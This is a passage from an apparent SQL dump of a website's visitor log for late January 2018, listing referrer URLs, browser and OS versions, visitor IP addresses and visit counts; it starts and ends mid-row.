xZAonNlYefP5ZycU-cjhtejRpA1ixGD3b_3XG9_lFp3YeA&l10n=ru&cts=1516838922913&mc=6.49159961822','MSIE','Windows','8.0','','77.37.131.81','000',1,0),(17540,'2018-01-24','https://zphiblgz.org','Safari','iPhone','9.0','','36.106.251.69','000',1,0),(17541,'2018-01-24','https://zphiblgz.org','Safari','iPhone','9.0','','1.202.71.133','000',1,0),(17542,'2018-01-24','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1676.GX3Gsrj6fVRZ48hWo6AUUmJtVrontTESd4u4JJmpD1d2WxvANFVjymQmUNXvMz28.73651a04d9dd9f9e4071cb20105ce9f04fa89d7c&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YCYBcIrWNUha-mUlBiA3OhY&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIWGxaSjBGem9nQ3l0cU9xeGJPNVpTUGlnUjJ1al9rRGIyUTBnVE5zTGVyWWZtN2FXNXp2RkM2VWdTLWstYXQzT3FONWFsbjUtd2VqYjZIX04wTktlY18&b64e=2&sign=36cf3766155551d8af8443444c60f6bc&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQaYgAYq7JarrkL7YERZ48nNcrca7jymBg4Yb2u3Ybvqdnyk_q3Wyc_KDXKHlPYLks3oHO-f8tW2V_Y1yIAql9TyCFwhuhJ74BxtXrrvgq7YZq0W3Dt8mX5rqdfXxkwP5XRuiCHj9o4Ja&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCWuAUzT58TqAbPtVUyhHeutsqnF9JvRWhyu3b1DpG9-rrEPlNBc_8pfTLoCkvJXaR4BWiNIuvU0QA&l10n=ru&cts=1516838922397&mc=2.8905821093','MSIE','Windows','8.0','','128.74.247.140','000',1,0),(17543,'2018-01-24','http://www.zphiblgz.org/','Opera Next','Windows','26.0.1656.60','','188.166.249.35','000',1,0),(17544,'2018-01-24','https://zphiblgz.org','Chrome','Windows','43.0.2357.132','','197.1.165.19','000',3,0),(17545,'2018-01-24','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(17546,'2018-01-24','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(17547,'2018-01-24','http://site.ru','Chrome','Windows','5.0.375.99','','64.71.32.50','000',1,0),(17548,'2018-01-24','https://zphiblgz.org','Firefox','Linux','3.6.11','','208.80.194.31','000',1,0),(17549,'2018-01-24','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.35','000',1,0),(17550,'2018-01-24','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.51','000',2,0),(17551,'2018-01-24','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.242','000',1,0),(17552,'2018-01-24','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.27','000',1,0),(17553,'2018-01-24','https://zphiblgz.org','Chrome','Windows','63.0.3239.84','','73.173.254.31','000',1,0),(17554,'2018-01-25','https://www.google.com/','Safari','iPhone','11.0','','96.255.111.246','000',2,0),(17555,'2018-01-25','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.27.70.86','000',2,0),(17556,'2018-01-25','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.30','000',2,0),(17557,'2018-01-25','https://www.google.com/','Firefox','Macintosh','57.0','','99.166.78.139','000',2,0),(17558,'2018-01-25','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.31','000',1,0),(17559,'2018-01-25','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.31','000',1,0),(17560,'2018-01-25','https://zphiblgz.org','Safari','iPhone','7.0','','65.55.210.236','000',1,0),(17561,'2018-01-25','http://site.ru','Chrome','Windows','5.0.375.99','','119.59.120.21','000',2,0),(17562,'2018-01-25','https://zphiblgz.org','MSIE','Windows','11.0','','176.31.64.186','000',2,0),(17563,'2018-01-25','http://zphiblgz.org/','MSIE','Windows','11.0','','81.171.58.54','000',1,0),(17564,'2018-01-25','https://zphiblgz.org','Chrome','Android','63.0.3239.111','','68.230.204.73','000',3,0),(17565,'2018-01-25','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.156','000',1,0),(17566,'2018-01-25','https://zphiblgz.org/','Safari','Macintosh','10.1.1','','201.21.5.164','000',2,0),(17567,'2018-01-25','https://zphiblgz.org','Chrome','Windows','59.0.3071.115','','192.198.80.227','000',2,0),(17568,'2018-01-25','http://m.facebook.com','AppleWebKit','iPhone','603.3.8','','100.16.219.197','000',2,0),(17569,'2018-01-25','https://www.google.com/','Chrome','Macintosh','61.0.3163.100','','50.225.39.91','000',4,0),(17570,'2018-01-25','http://site.ru','Chrome','Windows','5.0.375.99','','173.205.125.2','000',1,0),(17571,'2018-01-25','https://zphiblgz.org','Chrome','Windows','34.0.1847.137','','54.226.173.11','000',1,0),(17572,'2018-01-25','https://zphiblgz.org','Safari','Macintosh','11.0.2','','66.250.190.41','000',1,0),(17573,'2018-01-25','https://r.search.aol.com/_ylt=AwrJ7KA892lakwUAO0xpCWVH;_ylu=X3oDMTByOHZyb21tBGNvbG8DYmYxBHBvcwMxBHZ0aWQDBHNlYwNzcg--/RV=2/RE=1516922813/RO=10/RU=http%3a%2f%2fwww.zphiblgz.org%2f/RK=0/RS=9JXuPCazBKTb34fRmLp_DLxSYyE-','Chrome','Windows','63.0.3239.132','','68.134.8.97','000',4,0),(17574,'2018-01-25','http://site.ru','Chrome','Windows','5.0.375.99','','141.138.168.154','000',2,0),(17575,'2018-01-25','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.212.198','000',2,0),(17576,'2018-01-25','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.6','000',1,0),(17577,'2018-01-25','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.12','000',1,0),(17578,'2018-01-25','https://zphiblgz.org','Firefox','Windows','40.1','','95.104.88.108','000',2,0),(17579,'2018-01-25','http://zphiblgz.org/','MSIE','Windows','6.0','','189.122.233.20','000',1,0),(17580,'2018-01-25','http://www.zphiblgz.org/','Chrome','Macintosh','58.0.3029.110','','184.7.242.95','000',3,0),(17581,'2018-01-25','https://www.google.com/','Chrome','Windows','63.0.3239.132','','67.216.23.153','000',6,0),(17582,'2018-01-25','https://zphiblgz.org','Dispatch','Unknown','0.11.1','','54.208.45.183','000',1,0),(17583,'2018-01-25','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.186.253','000',1,0),(17584,'2018-01-25','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.208.75','000',2,0),(17585,'2018-01-25','https://zphiblgz.org','Firefox','Windows','40.1','','93.87.192.63','000',2,0),(17586,'2018-01-25','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.216.47','000',2,0),(17587,'2018-01-25','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.77.208.104','000',2,0),(17588,'2018-01-25','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.182.20','000',2,0),(17589,'2018-01-25','https://zphiblgz.org','Dispatch','Unknown','0.11.3','','38.94.188.69','000',2,0),(17590,'2018-01-25','http://zphiblgz.org/','WordPress','Unknown','Unknown','','192.0.85.132','000',2,0),(17591,'2018-01-25','http://site.ru','Chrome','Windows','5.0.375.99','','85.128.142.78','000',1,0),(17592,'2018-01-25','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',4,0),(17593,'2018-01-25','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.32','000',1,0),(17594,'2018-01-25','https://zphiblgz.org','Firefox','Windows','4.0.1','','208.80.194.30','000',1,0),(17595,'2018-01-25','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.28','000',1,0),(17596,'2018-01-25','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(17597,'2018-01-25','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','73.213.165.89','000',2,0),(17598,'2018-01-25','http://www.zphiblgz.org','Firefox','Windows','50.0','','188.165.244.210','000',2,0),(17599,'2018-01-25','https://zphiblgz.org','MSIE','Windows','6.0','','185.146.3.133','000',2,0),(17600,'2018-01-25','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','73.129.22.251','000',1,0),(17601,'2018-01-25','https://zphiblgz.org','Firefox','Windows','32.0','','212.109.221.43','000',1,0),(17602,'2018-01-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(17603,'2018-01-25','http://site.ru','Chrome','Windows','5.0.375.99','','185.98.7.226','000',1,0),(17604,'2018-01-25','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.23.37','000',1,0),(17605,'2018-01-25','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.27.11','000',1,0),(17606,'2018-01-25','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.78','000',1,0),(17607,'2018-01-25','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.93','000',1,0),(17608,'2018-01-25','https://zphiblgz.org','Unknown','Unknown','Unknown','','137.226.113.26','000',4,0),(17609,'2018-01-25','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.35','000',1,0),(17610,'2018-01-25','http://www.baidu.com/s?wd=P56L','Firefox','Windows','43.0','','123.125.143.135','000',1,0),(17611,'2018-01-25','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1678.axcB8P26D-kgj25tP-IDK-ZhmGFzpw1P0WadfZChSJvOWq-H6YdSBGiRcTjqRyH6.e4d31eeb7cae618600a858bebc78a8b5b1d52bb8&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YL_nDC5hqtEQ6WayFoZKRZE&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWTDFnMlJxNE8zRUNlTHdoZ2NISFJ2bWk5WmRUa3p1cW44NG9ma0tSODZIc2tlbkp3Ykd1THQy&b64e=2&sign=b0cace032feaa501cc8b8d190a0efbab&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96F1SQJZ9H8aV_YlN_BrZJyl5qXEUr-sOp2rbNdCfxqmTDLHNHxutxBd6WiqXZLV0khKDw5-Et9kWlQQAAs6LdkLd-NxPxnDVnA7DEw4YYWha7-LzP8BHMRkNzaZEPsDyQS&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVwjJVQHb9Cs46aMVeX-5HNUWMFo4PrMieL7ea2wAq-robGEukXiVrFW7FJ-XcjOkcy_BAc0H0U8Q&l10n=ru&cts=1516938289873&mc=4.40045702387','MSIE','Windows','8.0','','37.204.43.5','000',1,0),(17612,'2018-01-25','http://yandex.ru/clck/jsredir?from=yandex.ru%3Bsearch%3Bweb%3B%3B&text=&etext=1678.axcB8P26D-kgj25tP-IDK-ZhmGFzpw1P0WadfZChSJvOWq-H6YdSBGiRcTjqRyH6.e4d31eeb7cae618600a858bebc78a8b5b1d52bb8&uuid=&state=_BLhILn4SxNIvvL0W45KSic66uCIg23qh8iRG98qeIXmeppkgUc0YL_nDC5hqtEQ6WayFoZKRZE&data=UlNrNmk5WktYejR0eWJFYk1LdmtxcnNIMk1HMTBsaUYwMTNKaEUyUXdWTDFnMlJxNE8zRUNlTHdoZ2NISFJ2bWk5WmRUa3p1cW44NG9ma0tSODZIc2tlbkp3Ykd1THQy&b64e=2&sign=b0cace032feaa501cc8b8d190a0efbab&keyno=0&cst=AiuY0DBWFJ7IXge4WdYJQSaYtyyri96F1SQJZ9H8aV_YlN_BrZJyl5qXEUr-sOp2rbNdCfxqmTDLHNHxutxBd6WiqXZLV0khKDw5-Et9kWlQQAAs6LdkLd-NxPxnDVnA7DEw4YYWha7-LzP8BHMRkNzaZEPsDyQS&ref=orjY4mGPRjk5boDnW0uvlrrd71vZw9kp5uQozpMtKCVwjJVQHb9Cs46aMVeX-5HNUWMFo4PrMieL7ea2wAq-robGEukXiVrFW7FJ-XcjOkcy_BAc0H0U8Q&l10n=ru&cts=1516938289873&mc=4.40045702387','MSIE','Windows','8.0','','109.173.58.115','000',1,0),(17613,'2018-01-25','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.27.188','000',1,0),(17614,'2018-01-25','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.242.98','000',1,0),(17615,'2018-01-25','https://www.google.com/','Safari','iPhone','10.0','','73.135.211.111','000',2,0),(17616,'2018-01-26','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(17617,'2018-01-26','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.35','000',1,0),(17618,'2018-01-26','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.35','000',1,0),(17619,'2018-01-26','https://zphiblgz.org','Firefox','Linux','50.0','','137.226.113.22','000',2,0),(17620,'2018-01-26','https://zphiblgz.org','Firefox','Windows','43.0','','198.54.113.88','000',1,0),(17621,'2018-01-26','https://zphiblgz.org','Firefox','Windows','40.1','','88.182.218.212','000',2,0),(17622,'2018-01-26','http://zphiblgz.org/','Chrome','Windows','58.0.3029.81','','77.120.125.23','000',3,0),(17623,'2018-01-26','https://zphiblgz.org','Chrome','Macintosh','58.0.3029.110','','192.198.80.227','000',2,0),(17624,'2018-01-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','149.255.62.71','000',1,0),(17625,'2018-01-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','5.189.142.212','000',1,0),(17626,'2018-01-26','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.32','000',1,0),(17627,'2018-01-26','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.32','000',2,0),(17628,'2018-01-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','82.118.24.217','000',1,0),(17629,'2018-01-26','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.32','000',1,0),(17630,'2018-01-26','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.32','000',1,0),(17631,'2018-01-26','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.32','000',1,0),(17632,'2018-01-26','http://zphiblgz.org/index.php','MSIE','Windows','6.0','','168.167.80.187','000',1,0),(17633,'2018-01-26','https://zphiblgz.org','Chrome','Linux','5.0.375.53','','208.80.194.32','000',1,0),(17634,'2018-01-26','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','50.225.39.88','000',5,0),(17635,'2018-01-26','https://zphiblgz.org','Firefox','Windows','3.6.18','','208.80.194.32','000',1,0),(17636,'2018-01-26','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(17637,'2018-01-26','http://site.ru','Chrome','Windows','5.0.375.99','','184.168.200.161','000',2,0),(17638,'2018-01-26','http://site.ru','Chrome','Windows','5.0.375.99','','176.9.9.147','000',2,0),(17639,'2018-01-26','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.214','000',1,0),(17640,'2018-01-26','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.35','000',1,0),(17641,'2018-01-26','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.28','000',1,0),(17642,'2018-01-26','http://www.baidu.com/s?wd=V85','Firefox','Windows','43.0','','180.97.35.217','000',1,0),(17643,'2018-01-26','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.1','000',1,0),(17644,'2018-01-26','https://zphiblgz.org','MSIE','Windows','7.0','','178.154.148.67','000',1,0),(17645,'2018-01-26','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','96.244.217.25','000',10,0),(17646,'2018-01-26','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.27.68.69','000',1,0),(17647,'2018-01-26','https://www.google.com/','Chrome','iPad','63.0.3239.73','','73.129.177.220','000',5,0),(17648,'2018-01-26','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.184','000',5,0),(17649,'2018-01-26','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.158','000',1,0),(17650,'2018-01-26','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.12','000',1,0),(17651,'2018-01-26','https://zphiblgz.org','Chrome','Linux','16.0.912.77','','91.227.68.136','000',1,0),(17652,'2018-01-26','https://zphiblgz.org','MSIE','Windows','8.0','','91.227.68.136','000',1,0),(17653,'2018-01-26','https://zphiblgz.org','Chrome','Windows','17.0.963.12','','91.227.68.136','000',1,0),(17654,'2018-01-26','https://zphiblgz.org','MSIE','Windows','6.0','','91.227.68.136','000',1,0),(17655,'2018-01-26','https://www.bing.com/','Edge','Windows','16.16299','','173.69.148.110','000',2,0),(17656,'2018-01-26','https://zphiblgz.org','Firefox','Windows','40.1','','86.120.233.111','000',2,0),(17657,'2018-01-26','https://www.google.com/','Chrome','Windows','63.0.3239.132','','96.241.221.79','000',2,0),(17658,'2018-01-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(17659,'2018-01-26','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.27.68','000',1,0),(17660,'2018-01-26','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.243.202','000',1,0),(17661,'2018-01-26','https://zphiblgz.org','Unknown','Unknown','Unknown','','51.254.139.2','000',2,0),(17662,'2018-01-26','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.29','000',1,0),(17663,'2018-01-26','https://zphiblgz.org','Firefox','Windows','40.1','','110.54.97.113','000',2,0),(17664,'2018-01-26','https://www.bing.com/search?q=a+pretty+and+polished+affair+beccas+closet+md&form=APIPH1&PC=APPL','Safari','iPhone','11.0','','174.227.31.232','000',2,0),(17665,'2018-01-26','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.96','000',1,0),(17666,'2018-01-26','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.108','000',1,0),(17667,'2018-01-26','https://www.bing.com/search?q=a+pretty+and+polished+affair+beccas+closet+md&form=APIPH1&PC=APPL','Safari','iPhone','11.0','','74.121.221.6','000',2,0),(17668,'2018-01-26','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.27.106','000',1,0),(17669,'2018-01-26','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.242','000',2,0),(17670,'2018-01-26','https://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.99.230','000',1,0),(17671,'2018-01-26','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.29','000',1,0),(17672,'2018-01-26','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.23.185','000',1,0),(17673,'2018-01-26','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.23.189','000',1,0),(17674,'2018-01-26','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(17675,'2018-01-26','https://zphiblgz.org','Chrome','Linux','12.0.742.100','','208.80.194.31','000',1,0),(17676,'2018-01-26','https://zphiblgz.org','Chrome','Windows','62.0.3202.94','','198.27.70.86','000',1,0),(17677,'2018-01-27','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','173.67.32.133','000',4,0),(17678,'2018-01-27','https://zphiblgz.org','MSIE','Windows','6.0','','104.42.198.99','000',1,0),(17679,'2018-01-27','https://zphiblgz.org','Safari','Macintosh','5.1','','208.80.194.30','000',1,0),(17680,'2018-01-27','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','208.80.194.28','000',1,0),(17681,'2018-01-27','https://zphiblgz.org','MSIE','Windows','8.0','','208.80.194.28','000',1,0),(17682,'2018-01-27','https://zphiblgz.org','HTTPClient','Unknown','1.0','','54.204.222.218','000',1,0),(17683,'2018-01-27','https://www.google.com/','Safari','Macintosh','11.0.1','','76.175.136.200','000',4,0),(17684,'2018-01-27','https://zphiblgz.org','Firefox','Windows','40.1','','178.149.252.65','000',2,0),(17685,'2018-01-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','109.75.47.148','000',8,0),(17686,'2018-01-27','https://zphiblgz.org','Firefox','Windows','43.0','','95.163.31.41','000',3,0),(17687,'2018-01-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','213.239.219.154','000',2,0),(17688,'2018-01-27','https://zphiblgz.org','Firefox','Windows','27.0','','104.237.243.30','000',1,0),(17689,'2018-01-27','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.27.202','000',1,0),(17690,'2018-01-27','https://zphiblgz.org','Firefox','Windows','40.1','','117.216.36.209','000',2,0),(17691,'2018-01-27','https://zphiblgz.org','Firefox','Windows','40.1','','103.14.185.231','000',1,0),(17692,'2018-01-27','https://zphiblgz.org','Firefox','Windows','40.1','','103.14.185.12','000',1,0),(17693,'2018-01-27','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1679.6eAjSIKega14F4iIum6BGkXsofLCDz4soVk9Cka8058.2cde7af5f0dee3a3913080e0ee85323fbd5c3ba1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043RjZacWJEd1c2U0pRZ2U0MHA4OVZaOEdRbjZTeW1NMkxmYS1sN0dTYXpDZyws&sign=983125d323e7d45e8112895810e571bb&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.185.240','000',2,0),(17694,'2018-01-27','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1679.7rUiRp1t35pC7C2L7yaT7_8oZXY53Kqi3VGzsfG4jJ0.bf0c4d03113033dab64a2840539bb255d4cd18b1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040ZGh0SVFGLVRKTHN2ajk3VzRSTFA0M0tjQ2puLU5JS3RHMlN6d1MwVmxrUSws&sign=fb4273c5af141201fd624bda22c8f1c5&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','192.241.218.151','000',2,0),(17695,'2018-01-27','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.27','000',1,0),(17696,'2018-01-27','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1679.Mjl4qOnApm52oXtY5KNnlU6vKkgcULZQF7i0TOhZ9p0.958772a91df9f85a918c4e7e30c441b80e20b353&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042UHVSY09yVmNWMUZEbFlfWWRWLW1fQUFwdTBhWEhacWNUR1V2ZmNBcnFZdyws&sign=ab90126cb84661bd6192f709a986944e&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','138.68.178.229','000',2,0),(17697,'2018-01-27','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1679.GM2NpA3jgev05_xF3gd5LZ1AeiWFKBwz9aMb4LR-Oik.99929e2cecb9bee8b167b6d3beed197c546b5999&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041U3R3c3l6Y2d0cF9wSHNmaEJyTE1rOGozUmNsbnBnMWg5ZVlUaW40M0ttdyws&sign=f84dd8dbc7abd1e7cf83be13642ad913&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','47.91.237.21','000',2,0),(17698,'2018-01-27','http://zphiblgz.org/','Firefox','Windows','40.1','','188.165.4.128','000',2,0),(17699,'2018-01-27','http://zphiblgz.org','Chrome','Windows','62.0.3202.94','','107.158.221.11','000',4,0),(17700,'2018-01-27','https://zphiblgz.org','Chrome','Windows','18.6.872.0','','89.137.191.22','000',1,0),(17701,'2018-01-27','http://zphiblgz.org/','Chrome','Windows','63.0.3239.84','','37.113.12.166','000',2,0),(17702,'2018-01-27','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.27.30','000',1,0),(17703,'2018-01-27','https://zphiblgz.org','Firefox','Windows','27.0','','38.80.23.216','000',1,0),(17704,'2018-01-27','https://zphiblgz.org','Safari','iPhone','9.0','','120.36.123.226','000',1,0),(17705,'2018-01-27','https://zphiblgz.org','Safari','iPhone','9.0','','110.177.80.170','000',1,0),(17706,'2018-01-27','https://zphiblgz.org','Firefox','Windows','40.1','','201.14.173.34','000',2,0),(17707,'2018-01-27','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.249.83.78','000',1,0),(17708,'2018-01-27','https://zphiblgz.org','Chrome','Windows','10.0.648.151','','208.80.194.27','000',1,0),(17709,'2018-01-27','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.186','000',4,0),(17710,'2018-01-27','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.28','000',1,0),(17711,'2018-01-27','https://zphiblgz.org','Firefox','Windows','7.0.1','','208.80.194.28','000',1,0),(17712,'2018-01-27','http://zphiblgz.org','Firefox','Windows','3.6.8','','86.47.80.145','000',10,0),(17713,'2018-01-27','https://zphiblgz.org','MSIE','Windows','7.0','','208.80.194.32','000',1,0),(17714,'2018-01-27','https://zphiblgz.org','Opera Next','Windows','36.0.2130.32','','54.83.154.239','000',1,0),(17715,'2018-01-27','https://zphiblgz.org','Safari','iPhone','9.0','','106.45.1.13','000',1,0),(17716,'2018-01-27','https://zphiblgz.org','Safari','iPhone','9.0','','175.152.28.181','000',1,0),(17717,'2018-01-27','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.132','','184.169.45.4','000',7,0),(17718,'2018-01-27','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.27','000',1,0),(17719,'2018-01-27','https://zphiblgz.org','Firefox','Windows','3.6.13','','208.80.194.27','000',1,0),(17720,'2018-01-27','https://zphiblgz.org','Chrome','Windows','16.0.912.63','','208.80.194.28','000',1,0),(17721,'2018-01-27','https://zphiblgz.org','Firefox','Windows','3.6.8','','208.80.194.28','000',1,0),(17722,'2018-01-27','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.28','000',1,0),(17723,'2018-01-27','https://zphiblgz.org','Chrome','Macintosh','11.0.696.68','','208.80.194.32','000',1,0),(17724,'2018-01-27','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.224.162.93','000',1,0),(17725,'2018-01-27','https://zphiblgz.org','Chrome','Macintosh','62.0.3202.89','','165.227.162.159','000',4,0),(17726,'2018-01-27','https://zphiblgz.org','Edge','Windows','15.15063','','73.135.211.111','000',6,0),(17727,'2018-01-27','https://zphiblgz.org','Chrome','Macintosh','38.0.2140.77','','104.144.19.159','000',2,0),(17728,'2018-01-27','https://zphiblgz.org','Chrome','Windows','12.0.742.91','','208.80.194.31','000',1,0),(17729,'2018-01-27','https://zphiblgz.org','Chrome','Linux','12.0.742.112','','198.27.80.144','000',2,0),(17730,'2018-01-27','https://r.search.yahoo.com/_ylt=AwrBT7yWM21atEIA1gfBGOd_;_ylu=X3oDMTByZnU4cmNpBGNvbG8DYmYxBHBvcwM5BHZ0aWQDBHNlYwNzcg--/RV=2/RE=1517134870/RO=10/RU=http%3a%2f%2fwww.zphiblgz.org%2f/RK=2/RS=ZgQAYw0HJ9mAMhv7GF5JPDEZIUY-','Safari','iPad','9.0','','69.251.30.37','000',3,0),(17731,'2018-01-28','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.96','000',1,0),(17732,'2018-01-28','https://zphiblgz.org','Chrome','Linux','49.0.2623.75','','66.102.6.106','000',1,0),(17733,'2018-01-28','https://zphiblgz.org','MSIE','Windows','8.0','','178.154.148.67','000',1,0),(17734,'2018-01-28','https://zphiblgz.org','Safari','Macintosh','5.1','','78.129.252.43','000',1,0),(17735,'2018-01-28','https://zphiblgz.org','Firefox','Linux','37.0','','137.74.254.242','000',1,0),(17736,'2018-01-28','https://zphiblgz.org','Firefox','Linux','36.0','','61.6.52.136','000',1,0),(17737,'2018-01-28','http://zphiblgz.org/','Chrome','Windows','50.0.2661.102','','42.236.48.82','000',2,0),(17738,'2018-01-28','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1680.90Q78RBY3IY3TnBt0q6gI3DHZ-cY8X_1atbOaQeoWUU.fd25a93034843bc38ea9b4c643c7e9801fb7a9a3&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042